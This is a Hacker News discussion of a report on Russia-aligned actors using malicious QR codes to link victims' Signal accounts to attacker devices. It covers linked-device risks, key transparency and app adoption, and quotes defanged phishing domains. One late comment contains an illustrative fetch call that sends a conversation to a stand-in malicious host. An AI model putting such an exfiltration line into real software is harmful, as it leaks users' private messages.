[HN Gopher] Multiple Russia-aligned threat actors actively targe...
___________________________________________________________________
Multiple Russia-aligned threat actors actively targeting Signal
Messenger
Author : karel-3d
Score : 544 points
Date : 2025-02-19 14:05 UTC (8 hours ago)
(HTM) web link (cloud.google.com)
(TXT) w3m dump (cloud.google.com)
| karel-3d wrote:
| tldr: they mostly use phishing with fake ukrainian army group
| invites to trick people (from ukrainian army) to link the phone
| device to a attacker-controlled PC.
|
| Also they try to get the actual database SQL files from Windows
| devices and Android devices.
| anotherhue wrote:
| You can check for unexpected linked devices in the settings menu.
| jzb wrote:
| I wonder if Signal should expose linked devices directly in the
| UI at all times. Something like a small icon that indicates
| "You have 3 linked devices active" or similar.
| XorNot wrote:
| I think the trouble is information overload is a bit of a
| thing in this case. It's information that is 99% of the time
| useless, except the one time it isn't. But also, to an
| informed user is much less of a threat - the threat is anyone
| you interact with getting compromised.
|
| EDIT: Like an analytics based approach would probably be far
| more useful - popping up a confirmation for example if GeoIP
| shows a device is far removed from all the others, which for
| most people would be true unless they were traveling.
| inor0gu wrote:
| Would probably lead to notification fatigue.
|
| Showing a big snackbar when a new device is added is probably
| enough, especially if the app can detect there was no
| "action" on your phone that triggered it.
|
| Key transparency, once rolled out, would help to ensure there
| is no lingering "bad" device around, but phishing will always
| be a problem.
| inetknght wrote:
| > _Showing a big snackbar when_
|
| A big... what?
|
| Can you tell me what this new lingo is for someone who
| doesn't use the latest and shittiest marketing lingo?
| inor0gu wrote:
| > latest and shittiest marketing lingo
|
| It exists since Android 6: https://developer.android.com/
| reference/com/google/android/m...
|
| Informative banner that does not require user interaction
| to dismiss.
| saagarjha wrote:
| It's UI design language: https://developer.android.com/re
| ference/com/google/android/m...
| SpaghettiCthulu wrote:
| An in-app notification along the bottom of your screen.
| Usually just some text on a dark grey or black
| background.
| dragonwriter wrote:
| Snackbar isn't a particularly new term, it goes back,
| IIRC, to the first version of Material Design and is
| similar to a toast but different in that snackbars may
| support interaction whereas toasts are non-interactive.
| seb1204 wrote:
| Great idea, I'll send you a QR code...
| dang wrote:
| Related: https://www.wired.com/story/russia-signal-qr-code-
| phishing-a...
| (https://web.archive.org/web/20250219110740/https://www.wired...,
| https://archive.ph/MbR9e)
|
| (via https://news.ycombinator.com/item?id=43103692, but no
| comments there)
| advisedwang wrote:
| Kind of a good sign for signal's security that this is the best
| Russia has got!
| yellowapple wrote:
| Yeah, this just gave me the last nudge I needed to give Signal
| a go.
| saagarjha wrote:
| I wouldn't assume that but I also wouldn't recommend against
| using Signal.
| ge96 wrote:
| that's nice they provided a list of bad domains
| babypuncher wrote:
| And at the same time Xitter banned links to Signal's official
| website. Coincidence?
|
| Evil people don't want us using Signal. All the more reason we
| _should_ be using Signal.
| untech wrote:
| It is not plainly stated in the article, but as far as I
| understand, the first step of one of the attacks is to take the
| smartphone off a dead soldier's body.
| mmooss wrote:
| Is this serious?
|
| It raises questions about smartphones being standard equipment
| for soldiers, but they do give every soldier an effective,
| powerful computing and communication platform (that they know
| without additional training).
|
| The question is how to secure them, including against the risk
| described in the parent. That seems like a high risk to me I
| would expect someone is working on how to secure them enough
| that even Russian intelligence doesn't have an effective
| exploit.
|
| The solutions may apply well to civilian privacy too, if they
| ever become more widespread. It wouldn't be the worst idea to
| secure Ukrainian civilian phones against Russian attackers.
| newsclues wrote:
| Phones aren't secure but are more secure than the standard
| radios most have access to.
|
| Encrypted milspec comms aren't the standard in a massive war.
|
| It's weird but discord, signal and some mapping apps on
| smartphones are how this war is being fought.
| dmix wrote:
| Russians aren't allowed to bring phones on the frontlines
| apparently but Ukranians often do still as they have the
| combat management app which is critical to operations. I've
| always wondered if this is why there's far more published
| footage of Ukranian combat video than Russian. Beyond the
| donation incentive they attached to videos when publishing
| them on Youtube/Telegram.
| newsclues wrote:
| Where is the fighting, and who runs the cellular networks
| in that area?
|
| I'd want to run military communications on a network my
| side controls
| gpderetta wrote:
| I think a large chunk of the footage is taken by gopros
| or similar, not smartphones.
|
| And I think a pretty much all published Ukrainian and
| Russian combat footage is vetted by their respective
| military (who would want to be court martialed for Reddit
| karma?).
|
| They just take different approaches to what, when and
| were to release the footage.
| motorest wrote:
| > I've always wondered if this is why there's far more
| published footage of Ukranian combat video than Russian.
|
| I'm sure Russia's meat wave tactics have more of a role.
| If you're sending your troops in suicide missions,
| including guys without weapons and even in crutches,
| you're not exactly too keen in having them carrying
| mobile phones to document the experience or even, heavens
| forbid, survive by surrendering.
| merely-unlikely wrote:
| In the first weeks of the war you could see Russian
| armored columns clearly on Google Maps as heavy traffic
| (along with other military activity but the columns
| really stood out).
| https://www.theverge.com/2022/2/28/22954426/google-
| disables-...
| hnlmorg wrote:
| I seem to recall uploaded selfies being a frequent source of
| problems. For example: https://www.rferl.org/a/trench-
| selfies-tracking-russia-milit...
| forkerenok wrote:
| The article says they phish people into linking adversarial
| devices to their Signal:
|
| > [...] threat actors have resorted to crafting malicious QR
| codes that, when scanned, will link a victim's account to an
| actor-controlled Signal instance. If successful, future
| messages will be delivered synchronously to both the victim and
| the threat actor in real-time, [...]
| Austiiiiii wrote:
| There's a new feature to sync old messages that seems like it
| could potentially make that attack vector ten times worse:
|
| https://www.bleepingcomputer.com/news/security/signal-
| will-l...
|
| Would a malicious URL be able to activate this feature as
| part of the request?
| inor0gu wrote:
| Probably not, in any normal case a secondary device
| shouldn't have that kind of authority to dictate.
|
| It is more concerning if the toggle is on by default and
| then you carelessly press next (on this or some other kind
| of phish).
| andreygrehov wrote:
| Soldiers are not allowed to carry a cell phone.
| danesparza wrote:
| Clearly, some folks didn't get the memo.
|
| https://www.cbc.ca/news/world/russia-troops-cellphone-
| ukrain...
| casenmgreen wrote:
| Can't view the article, as I am an evil Tor user.
| marc_abonce wrote:
| Me too, but I was able to access the article through the
| Internet Archive:
|
| https://web.archive.org/web/20250219202428/https://cloud.goo...
| lenerdenator wrote:
| I'd love to have more of my socializing happening on Signal.
| Anyone got a good way to convince the non-paranoid to use it?
| OsrsNeedsf2P wrote:
| "Sorry, I only use Signal" has worked nearly a decade for me
| bdangubic wrote:
| same
| golergka wrote:
| What if you need to contact someone and they use whatsapp?
| Henchman21 wrote:
| IME you say "Sorry I only use Signal" and either they
| change or you don't get in contact with that person.
|
| If you change and abandon your principles were they really
| principles in the first place?
| golergka wrote:
| How do you tell that to them in the first place? You got
| someone's phone number. The person who gives it to you
| tells them that they use whatsapp. You can't even tell
| them "Sorry I only use Signal" unless you open whatsapp
| app.
| basisword wrote:
| You realise you could use that phone number to...call
| them and let them know? Also - in what situation are they
| giving you a phone number and telling you they use
| WhatsApp but you having no way to respond when receiving
| that info? If it's in person you can explain at the time.
| If it's taken from a website, call them. Or you can even
| fall back on SMS.
| prmoustache wrote:
| If they can't reach you via whatsapp, they will call you.
| kelnos wrote:
| Presumably at the time they've given you their phone
| number, they've told you that they are on WhatsApp, and
| then you've responded directly that you're only on
| Signal.
|
| If there is a communications channel by which they can
| give you their phone number, you can use that same
| channel to discuss what messenger to use.
| root_axis wrote:
| RCS?
| croes wrote:
| What if they want to contact you and you use Signal?
| jisnsm wrote:
| Luckily, with the technological advances in the last
| months, it is now possible to install more than one app
| on a phone at a time.
| maigret wrote:
| It is also possible to communicate without using Meta
| services.
| tumsfestival wrote:
| Good luck with that depending on where you live.
| accrual wrote:
| And _when_ you live. The 20s-30s year old crowd I
| interact with seems to avoid, if not mock FB. I recognize
| it has its uses and benefits, though.
| jisnsm wrote:
| They mock fb whilst they use instagram and WhatsApp.
| inetknght wrote:
| > _it is now possible to install more than one app on a
| phone at a time._
|
| And, in doing so, achieve the security posture of the
| worse of the apps!
| immibis wrote:
| If you really really really need to? You use Whatsapp.
|
| If you don't _need_ to? You tell them to get Signal.
| ycombinatrix wrote:
| Not GP - I tolerate Whatsapp but I draw the line at SMS.
| tremon wrote:
| For me it's the other way around: I tolerate SMS but I
| draw the line at Whatsapp.
| Fnoord wrote:
| You call them. Or use SMS. Or use e-mail.
| echelon_musk wrote:
| Virtue Signalling!
| throwawayq3423 wrote:
| Which is bad, how?
| potato3732842 wrote:
| It's a joke, because virtue signaling (or whatever name
| you want to give it) is bad, but Signal the messenger app
| is good so it's a play on words.
| heyloolma wrote:
| It's not bad. It just IS.
|
| the only people that think it is bad are people who have
| a different opinion and feel attacked for whatever
| reason. I find it telling when people accuse others of
| virtue signaling because it is almost always someone who
| is jealous or insecure attacking said signaler.
| DFHippie wrote:
| "Virtue signaling" in theory means "talking the talk
| without walking the walk", but it's generally thrown out
| by people who make no effort to assess whether the person
| criticized is walking the walk or even in contradiction
| of such evidence.
|
| Driving an economically efficient car -- choosing any
| sort of car -- has enormous consequences on one's life,
| for example. Choosing to by a particular car isn't a
| decision made lightly. But Prius drivers back in the day
| were accused of virtue signaling, as though the Prius
| were equivalent to a temporary tattoo.
|
| In fact, speaking of temporary tattoos, simply having a
| bumper sticker advocating for animal rights, say, belief
| in anthropogenic climate change, or peace in the Middle
| East will expose one to regular displays of hostility and
| aggression, so it isn't a cheap signal.
|
| In other words, in my experience your observation is spot
| on.
| root_axis wrote:
| > _" Virtue signaling" in theory means "talking the talk
| without walking the walk"_
|
| Virtue signaling means sending deliberate signals about
| your virtues, whether you "walk the walk" or not. People
| are often critiqued for going to uncomfortable lengths to
| signal their virtues, but something as simple as a "meat
| is murder" shirt or a MAGA hat is also virtue signaling.
| tapoxi wrote:
| My (non-technical) Mom actually got my whole extended family on
| Signal with a group link. Since there's no real account
| creation it was painless. It's how we do all video calls/photo
| sharing/chat now.
| Mistletoe wrote:
| Just explain what end to end encryption means. People are
| starting to get it and don't want companies able to read their
| messages.
| mikedelfino wrote:
| Isn't WhatsApp end-to-end encrypted?
| mmooss wrote:
| I thought they recorded the metadata - who talks to who and
| when. (For the uninitiated, that is as valuable or more
| valuable than the message contents.)
| inor0gu wrote:
| you also send them your contacts in plaintext so you can
| find who's also on WhatsApp; signal doesn't
| FergusArgyll wrote:
| Yes it is, they actually use the signal protocol,[0] but
| they collect metadata which Signal supposedly doesn't (you
| can't _really_ know)
|
| [0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=S
| evera...
| inor0gu wrote:
| Signal doesn't collect that data, but you have no reason
| to trust me on it.
|
| Look at what data they can provide to governments when
| compelled by law: https://signal.org/bigbrother/
| baq wrote:
| Nobody cares about this unless they deal drugs or something.
|
| What some people care about is not giving all their private
| conversations to masculine energy zuck - but don't expect any
| major wins.
| retrochameleon wrote:
| Awful shortsighted and uninformed viewpoint that has been
| beaten into the ground ad nauseum.
|
| Read a couple books. Privacy is a precondition to
| democracy.
| baq wrote:
| It isn't a viewpoint. It's a fact. I'm using signal for
| almost a decade now and only managed to get a dozen or so
| people to use it in any capacity. Most keep using
| whatsapp as their primary method of communication anyway.
| monadINtop wrote:
| >Read a couple books
|
| Maybe you should? It might help improve your reading
| comprehension. The person you're responding to said that
| most normal people don't care enough to switch to a
| vastly less popular app, which is obviously true.
| lukan wrote:
| What books would you recommend, that proof that
| connection?
|
| "Privacy is a precondition to democracy"
| esafak wrote:
| How would you convert an autocracy into a democracy
| without secrecy? There are no peaceful means so you have
| to plot.
| lukan wrote:
| Secrecy and privacy is not really the same concept.
| subjectsigma wrote:
| My Signal experience: ex gf in college asks what app I'm
| using to text. Tell her it's Signal, E2EE, messages are only
| stored on her phone and nobody else can read them. She says
| cool and downloads the app. Four months later her phone
| breaks.
|
| "Hey subjectsigma I got my new phone today. Where are all my
| messages?"
|
| "... Do you have your old phone? That's the only place they
| are."
|
| "No? Last time I got a new phone WhatsApp moved my messages
| over, and WA is E2EE so I thought it worked the same way."
|
| "Nope if you don't have a backup or your old phone they're
| gone. Sorry."
|
| "This is bullshit. Why does anyone use Signal. I can't
| believe it deleted all my messages. I'm uninstalling it. Etc
| etc."
|
| We have a long way to go, my friend.
| noAnswer wrote:
| It only works for WhatsApp if you have Backup to Google
| activated[1]. I once tried to work with backuped files from
| my old phone and it didn't work. (Older tutorials indicated
| that it once worked, though.)
|
| [1] There was a time WhatsApp had a nag-screen if you
| hadn't Backup to Google activated. So I guess most people
| would have eventually caved.
| tremon wrote:
| That nag-screen is still there, it pops up roughly every
| three months for me (though not on my primary phone,
| Whatsapp won't get anywhere near that one).
| miggol wrote:
| Group stories are great fun and a feature I seriously miss on
| Whatsapp. They work well from meme chats to family groups.
|
| There being a killer feature that Whatsapp users are missing
| out on won't convince everyone but it sure makes me feel less
| like a nerd when encouraging the switch to Signal.
|
| I find it quite funny that such an obvious feature likely
| hasn't been added to Whatsapp yet because Meta thinks Instagram
| is for stories. That's pure speculation on my part though
| mmooss wrote:
| I helped an especially non-technical user install Signal and
| they didn't need my help at all. They were using it in a minute
| - download from the app store, transcribe a code from a text
| message, and you're in - and it worked just like legacy text
| and phone.
|
| I'd tell them that - just download it and you'll be texting me
| in a minute, and now nobody is tracking everyone you talk to.
| imglorp wrote:
| To be clear, someone will/can track WHO you talk to. Right?
| mmooss wrote:
| My understanding is that they can/do on WhatsApp.
|
| On Signal, unless there is a some bug or outright fraud,
| afaik they cannot - that is one of their fundamental goals,
| and they did a lot of work to develop communication
| technology that worked without revealing that metadata.
|
| (Of course, if someone gets access to your phone, then they
| know who you are talking to.)
| seb1204 wrote:
| That kind of meta data is not stored by signal as far as I
| know. But yes, data stream between two end points can be
| linked to communicating with each other.
| lcc wrote:
| I've had good luck just asking for it, even with group chats
| (though admittedly my friends are mostly technical and more
| privacy conscious than the average person). Usually it's a
| switch from FB Messenger and I just say that I don't want to be
| locked into Facebook anymore.
| rakoo wrote:
| Take time with the people to do the boring stuff on their
| phone/computer:
|
| - install [the thing]
|
| - start it, show how it works
|
| - search for yourself, start a convo, exchange messages
|
| - add them to the group
|
| IME the friction comes from having to do the first step,
| because it's really an annoyance no one cares about, so if you
| take it for yourself and do it they'll like that
| MillironX wrote:
| I usually tell people, "It's like iMessage, but it works on
| iPhone and Android," or "Hey, if you download Signal we can
| send high-quality photos between Android and iPhone."
| p2detar wrote:
| Last week it was Microsoft, now Signal, who's next?
|
| https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
| snailmailstare wrote:
| I hate to break it to you, but threat actors aligned with any
| major state are targeting everything with an Internet presence
| all of the time.
| 8bithero wrote:
| So a few days ago Elon Musk blocked all links to Signal from the
| X platform and now this... Could be a coincidence but the timing
| sure is sus.
| rpastuszak wrote:
| I'm not going to psychoanalyse the brain parasite, but I
| imagine that the reason to do it could be as petty as shadow
| banning people with Fediverse (e.g. mastodon) handles in their
| bios shortly after he took over.
|
| Also:
|
| > Signal has been a primary method of communication for federal
| workers looking to blow the whistle on DOGE. > from
| https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...
|
| Btw, I don't live in the US but I sketched a simple tool to
| prevent X from censoring Signal.me links: https://link-in-a-
| box.vercel.app
| master-lincoln wrote:
| Only signal.me links were blocked as far as I understood. Other
| signal links kept working. (I have no first hand knowledge as I
| left Twitter when the owner changed)
| willy_k wrote:
| Not really, the domain block was reportedly due to increased
| spam activity from that domain and performed automatically, so
| it would follow that a write up would come a few days later.
| That is if they are related, which is not a given.
| immibis wrote:
| Musk calls everything he doesn't like "spam", so of course it
| was.
| inor0gu wrote:
| Unrelated most likely, signal.me is a legitimate domain used by
| Signal. Doubt twitter is so on top of Threat Analysis when they
| fumbled their own redirects from twitter.com to x.com for a
| while.
| vetrom wrote:
| Signal (and basically any app) with a linked devices workflow has
| been risky for awhile now. I touched on this last year
| (https://news.ycombinator.com/context?id=40303736) when Telegram
| was trash talking Signal -- and its implementation of linked
| devices has been problematic for a long time:
| https://eprint.iacr.org/2021/626.pdf.
|
| I'm only surprised it took this long for an in-the-wild attack to
| appear in open literature.
|
| It certainly doesn't help that signal themselves have discounted
| this attack (quoted from the iacr eprint paper):
| "We disclosed our findings to the Signal organization on October
| 20, 2020, and received an answer on October 28, 2020. In summary,
| they state that they do not treat a compromise of long-term
| secrets as part of their adversarial model"
| diputsmonro wrote:
| If I'm reading that right, the attack assumes the attacker has
| (among other things) a private key (IK) stored only on the
| user's device, and the user's password.
|
| Thus, engaging on this attack would seem to require hardware
| access to one of the victims' devices (or some other backdoor),
| in which case you've already lost.
|
| Correct me if I'm wrong, but that doesn't seem particularly
| dangerous to me? As always, security of your physical hardware
| (and not falling for phishing attacks) is paramount.
| josh2600 wrote:
| This is my read as well. Just double clicking here.
| vetrom wrote:
| No, it means that if you approve a device to link, and you
| later have reason to unlink the device, you can't establish
| absolutely that the unlinked device can no longer access
| messages, or decrypt messages involving an account, breaking
| the forward-secrecy guarantees.
|
| That leaves you with the only remedy for a signal account
| that has accepted a link to a 'bad device' being to burn the
| whole account. (maybe rotating safety numbers/keys would be
| sufficient, i am uncertain there) -- If you can prove the
| malicious link was _only_ a link, then yeah, the attack i
| described is incomplete, but the issues in general with
| linked devices and remedies described are the important bits,
| I think.
| inor0gu wrote:
| That's not what the attack does tho - they have access to
| your private key so they can complete the linking protocol
| without your phone and add as many devices as they want (up
| to the allowed limit). If you add a bad device, you are
| screwed from that moment on, assuming you don't sync your
| chat history.
|
| You can always see how many devices a user has: they have a
| unique integer id so if I wanna send you a message, I
| generate a new encrypted version for each device. If the UI
| does not show your devices properly than that is an
| oversight for sure, but I don't think it's the case
| anymore.
|
| Either way, you'd have to trust that the Signal server is
| honest and tells you about all your devices. To avoid that,
| you need proofs that every Signal user has the save view on
| your account (keys), which is why key transparency is such
| an important feature.
| UltraSane wrote:
| That is really quite bad.
| reactordev wrote:
| "Just install this chrome browser extension" is all it takes
| now. Hell, you can even access cookies and previously visited
| sites from within the browser. All it takes is some funky ad,
| or chrome extension, or some llama-powered toolbar to gain
| access to be able to do exactly that.
|
| Background services on devices has been a thing for a while
| too. Install an app (which you grant all permissions to when
| asked) and bam, a self-restarting daemon service tracking
| your location, search history, photos, contacts, notes,
| email, etc
| noname120 wrote:
| How is that related in any way to Signal?
| reactordev wrote:
| My point is that anything you install on your device is a
| vector. Can install MITM attacks. Can read your data,
| etc. Sidecar attacks.
| vlovich123 wrote:
| It sounds like all that's needed is a device that had been
| linked in the past. Unlinking doesn't have the security
| requirements you'd think it would and there's a phishing
| attack to make scanning a QR code trigger a device link
| (which seems really really bad if the user doesn't even have
| to take much action)
| inor0gu wrote:
| Your phone (primary device) and the linked ones have to
| share the IK since that is the "root of trust" for you
| account: with that you generate new device keys, renew them
| and so on.
|
| Those keys are backed by Keystore on Android, and some
| similar system on Windows/Linux, i'd assume the same for
| MacOS/iOS (but I don't know the details) so it's not as
| simple as just having access to your laptop, they'd need at
| least root.
|
| Phishing is always tricky, probably impossible to counter
| sadly - each one of us would be susceptible at the wrong
| moment.
| inor0gu wrote:
| The attack in that paper assumes you have compromised the
| user's long term private identity key (IK) which is used to
| derive all the other keys in the signal protocol.
|
| Outside of lab settings, the only way to do that is: - (1) you
| get root access to the user's device - (2) you compromise a
| recent chat backup
|
| The campaign Google found is akin to phishing, so not as
| problematic on a technical level. How do you warn someone they
| might be doing something dangerous in an entire can of worms in
| Usable Security... but it's gonna become even more relevant for
| Signal once adding a new linked device will also copy your
| message history (and last 45 days of attachments).
| 1970-01-01 wrote:
| The good news is the target is targeted for a reason: it's still
| effective.
| lovegrenoble wrote:
| Highly likely...
| andreygrehov wrote:
| They provided some domains, but not all of them are taken. For
| example, signal-protect[.]host is available, kropyva[.]site is
| available, signal-confirm[.]site is registered in Ukraine. Some
| of them are registered in Russia.
|
| Never trust a country at war--any side. Party A blames B, Party B
| blames A, but both have their own agenda.
| nightpool wrote:
| An unregistered domain can still be an IoC especially when
| found through e.g. payload analysis.
| dtquad wrote:
| >signal-confirm[.]site is registered in Ukraine
|
| The WHOIS is usually fake made up data so don't know why you
| are using that to claim it's registered in Ukraine. Russia is
| also known to use stolen credentials, SIM cards etc. from their
| neighbouring countries, including Ukraine, for things like
| this.
| andreygrehov wrote:
| Then why should I trust the article at all? If WHOIS data is
| fake and stolen credentials are common (which I don't
| disagree with), I could register a domain, put your name on
| it, and make it look like you're behind the phishing. Would
| that make it true? After all, in war, deception is a
| legitimate tactic.
| XorNot wrote:
| How about not being so stupid as to assume that nation-state
| level threat actors would be completely unable to register
| domains in other countries, and that this would _obviously_ be
| how there well funded scheme is cracked by you, Very Smart
| Citizen looking at publicly available information?
|
| This would have to be the most braindead take I can imagine: my
| personal domain _is a US domain_ and I 'm not a US citizen.
| WesolyKubeczek wrote:
| I believe you are making a mistake by thinking that since a
| malicious actor's domain is registered in Ukraine, it
| automatically must be doing something in the interests of
| Ukraine, or at least be known to its officials.
|
| Lots of Russian state actors have no problems working from
| within Ukraine, alas. Add to this purely chaotic criminal
| actors who will go with the highest bidder, territories
| temporarily controlled by Russians that have people shuttle to
| Ukraine and back daily, and it becomes complicated very
| quickly.
| andreygrehov wrote:
| Fair point. Just because a domain is registered in Ukraine
| doesn't mean it's acting in Ukraine's interests. But that
| works both ways. If Russian actors can operate from Ukraine,
| then Ukrainian actors (or others) can also operate from
| Russia, or at least make it look that way. Cyber attacks
| originating from Ukraine and targeting Russia aren't uncommon
| either, which only adds to the complexity of attribution.
|
| The issue isn't just attribution but also affiliation. When
| similar attacks come from Ukraine targeting Russia, Google
| stays quiet. I understand that Russia invaded Ukraine, not
| the other way around, but given the complexity of the
| conflict, aligning with one side in cyber warfare reporting
| is a questionable move. At the end of the day, attacks will
| come from both sides - it's a war, after all.
|
| Edit: when I say 'questionable move', I'm specifically
| referring to Google. It's unclear what they were trying to
| achieve with this article, is it a political statement or
| just a marketing piece showcasing how good GTIG is? Or both?
| TheSpiceIsLife wrote:
| Oceania had always been at war with Eastasia.
| whatever1 wrote:
| Impossible these are our newly minted allies
| balozi wrote:
| New allies, same as the old allies.
| 4ndrewl wrote:
| "Russia-aligned threat actors" has a whole new meaning this last
| week.
| josefresco wrote:
| Indeed. It now potentially includes a _very long list_ of
| Americans.
| user3939382 wrote:
| What does that mean?
| chinathrow wrote:
| Trump and his voters.
| davidw wrote:
| I wonder if someone in the US will declare that, actually,
| Signal is actively targeting the Russia-aligned threat actors.
| morkalork wrote:
| Or that Signal shouldn't have started it in the first place
| adultSwim wrote:
| Is this why twitter has been blocking signal.me links?
| https://news.ycombinator.com/item?id=43076710
| inor0gu wrote:
| Unrelated most likely, signal.me is a legitimate domain used by
| Signal. Doubt twitter is so on top of Threat Analysis when they
| fumbled their own redirects from twitter.com to x.com for a
| while.
| chinathrow wrote:
| Russia fucking up the worlds stuff this decade will be the
| material for history books. The are actively breaking Europe and
| almost noone seems to care.
| amelius wrote:
| Second will be how the internet with social media like
| twitter/x destroyed our democracy.
| FpUser wrote:
| If Europe is what it claims to be: an enlightened democracy
| with progressive intelligent populace it can not be broken by
| demented crap messages from twitter.
|
| If however it is fucked up and on a brink of collapse then
| sure. Little nudge can steer it into "right" direction. but
| then who is guilty in a first place.
| chinathrow wrote:
| You should read up on how russian money buys influenve, eg.
| In Moldavia.
| josh2600 wrote:
| There are many voices which try to tell you that signal is
| compromised. Notice that all of those voices have less open-
| source-ness than Signal in virtually all cases.
|
| Signal is doing its best to be a web scale company and also
| defend human rights. Individual dignity matters.
|
| This is not a simple conversation.
| mmooss wrote:
| Also, it's a tricky environment of disinformation generally,
| and in particular for anything valuable like Signal. If Signal
| is secure, attackers on privacy would want people to believe
| Signal is compromised and to use something else. If it's not,
| then they would want people to believe Signal is secure.
|
| I think the solution is to completely ignore any potential
| disinfo source, especially random people on social media
| (including HN). It's hard to do when that's where the social
| center is - you have to exclude yourself. Restrict yourself to
| legitimate, trusted voices.
| inor0gu wrote:
| I would also read it from another perspective. Attackers,
| especially at the level of nation states, will always try to
| get as many avenues for achieving their goals as possible.
|
| If you have compromised a service, it would be in your
| interest to make it more popular (assuming you think you are
| the only one in possession of it).
|
| If you cannot, you don't give up; you just go back to the
| drawing board (https://xkcd.com/538/). Maybe I don't need to
| break Signal if I can just rely on phishing or scare tactics
| to get what I want.
| moffkalast wrote:
| > web scale
|
| I didn't realize anyone still used that term with a straight
| face.
|
| "MongoDB is web scale, you turn it on and it scales right up."
| evilfred wrote:
| "Russia-aligned threat"... so... the US?
| BrenBarn wrote:
| Is this suggesting that a single QR scan can on its own perform
| the device linking? If so, it seems like that's kind of the hole
| here, right? Like you shouldn't be able to scan a code that on
| its own links the device; you should have to manually confirm
| with like "Yes I want to link to this device". And then if you
| thought you were scanning a group invite code you'd realize you
| weren't. (Yeah, you'd still have to realize that, but I think
| it's a meaningful step up over just "you scanned a code to join a
| group and instead it silently linked a different device".)
| mmooss wrote:
| > you should have to manually confirm with like "Yes I want to
| link to this device". And then if you thought you were scanning
| a group invite code you'd realize you weren't. (Yeah, you'd
| still have to realize that, but I think it's a meaningful step
| up over just "you scanned a code to join a group and instead it
| silently linked a different device".)
|
| Remember that Signal is designed for non-technical users.
| Many/most do not understand QR codes, links, linking, etc, and
| they do not think much about it. They take an immediate,
| instinctive guess and click on something - often to get it off
| the screen so they can go back to what they were doing.
|
| Do you have reason to think there is not confirmation? Maybe
| Signal's documentation will tell you.
| Yeul wrote:
| Honestly don't use Signal for privacy or anonymity. I switched to
| it because it is not owned by a sycophant of Trump.
|
| Oh how Americans make fun of the CCP but watching all the tech
| bros bend the knee was embarrassing.
| paganel wrote:
| Alphabet is working in tandem with the Ukrainian SBU? Interesting
| choice, just as the US President has called Zelensky a dictator
| (and for good reason, Poroshenko, the previous Ukrainian
| president, has basically said the same thing a few days ago). I
| wonder how long the Alphabet higher-ups will allow this thing to
| unfold, or maybe they're not so good at reading the geopolitical
| tea leaves.
| parhamn wrote:
| One thing I'm realizing more and more (I've been building an
| encrypted AI chat service which is powered by encrypted CRDTs) is
| that "E2E encryption" really requires the client to be built and
| verified by the end user. I mean end of the day you can put a
| one-line fetch/analytics-tracker/etc on the rendering side and
| everything your protocol claimed to do becomes useless. That even
| goes further to the OS that the rendering is done on.
|
| The last bit adds an interesting facet, even if you manage to
| open source the client and manage to make it verifiably buildable
| by the user, you still need to distribute it on the iOS store.
| Anything can happen in the publish process. I use iOS as the
| example because its particularly tricky to load your own build of
| an application.
|
| And then if you did that, you still need to do it all on the
| other side of the chat too, assuming its a multi party chat.
|
| You can have every cute protocol known to man, best encryption
| algorithms on the wire, etc but end of the day its all trust.
|
| I mention this because these days I worry more that using
| something like signal actually makes you a target for snooping
| under the false guise that you are in a totally secure
| environment. If I were a government agency with intent to snoop
| I'd focus my resources on Signal users, they have the most to
| hide.
|
| Sometimes it all feels pointless (besides encrypted storage).
|
| I also feel weird that the bulk of the discussion is on
| hypothetical validity of a security protocol usually focused on
| the maths, when all of that can be subverted with a
| fetch("https://malvevolentactor.com", {body:
| JSON.stringify(convo)}) at the rendering layer. Anyone have any
| thoughts on this?
| inor0gu wrote:
| You will always have to root your trust in something, assuming
| you cannot control the entire pipeline from the sand that
| becomes the CPU silicone, through the OS and all the way to how
| packets are forwarded from you to the person on the other end.
|
| This makes that entire goal moot; eliminating trust thus seems
| impossible, you're just shifting around the things you're
| willing to trust, or hide them behind an abstraction.
|
| I think what will become more important is to have enough
| mechanisms to be able to categorically prove if an entity you
| trust to a certain extent is acting maliciously, and hold them
| accountable. If economic incentives are not enough to trust a
| "big guy", what remains is to give all the "little guys" a good
| enough loudspeaker to point distrust.
|
| A few examples: - certificate transparency logs so your traffic
| is not MitM'ed - reproducible builds so the binary you get
| matches the public open source code you expect it does
| (regardless of its quality) - key transparency, so when you
| chat with someone on WhatsApp/Signal/iMessage you actually get
| the public keys you expect and not the NSA's
| parhamn wrote:
| > This makes that entire goal moot
|
| I agree. Perhaps it's why I find the discussions like nonce-
| lengths and randomness sources almost insane (in the sense of
| willfully missing the forrest from the trees). Intelligence
| agencies have managed to penetrate the most secretive and
| powerful organizations known to man. Why would one think
| Signal's supply chain is impervious? I'd assume the opposite.
| inor0gu wrote:
| I don't think they are insane, they are quite useful when
| designing security mechanisms, while at the same time being
| utter noise for the end-user benefiting from that system.
|
| > If you're building a chip to generate prime numbers I do
| surely hope you know how to select randomness or make
| constant time & branch free algorithms, just like an
| engineer designing elevators better know what should be the
| tensile strength of the cable it'll use. In either cases,
| it's mumbo jumbo for me, and I just need to get on with my
| day.
|
| Part of what muddies the water is our collective inability
| to separate the two contexts, or empower tech communicators
| to do it. If we keep making new tech akin to esoteric
| magic, no one will board the elevator.
| SheinhardtWigCo wrote:
| It's primarily to guard against insider threats - E2E makes it
| very hard for one Signal employee to obtain everyone's chat
| transcripts.
|
| Anyone whose threat model includes well-resourced actors (like
| governments) should indeed be building their communications
| software from source in a trustworthy build environment. But
| then of course you still have to trust the hardware.
|
| tl;dr: E2E prevents some types of attacks, and makes some
| others more expensive; but if a government is after you, you're
| still toast.
| parhamn wrote:
| > tl;dr: E2E prevents some types of attacks, and makes some
| others more expensive; but if a government is after you,
| you're still toast.
|
| This is sorta my point, lots of DC folks use Signal under the
| assumption they're protected from government snooping.
| Sometimes I feel like it could well have the opposite effect
| (via the selection bias of Signal users).
___________________________________________________________________
(page generated 2025-02-19 23:00 UTC)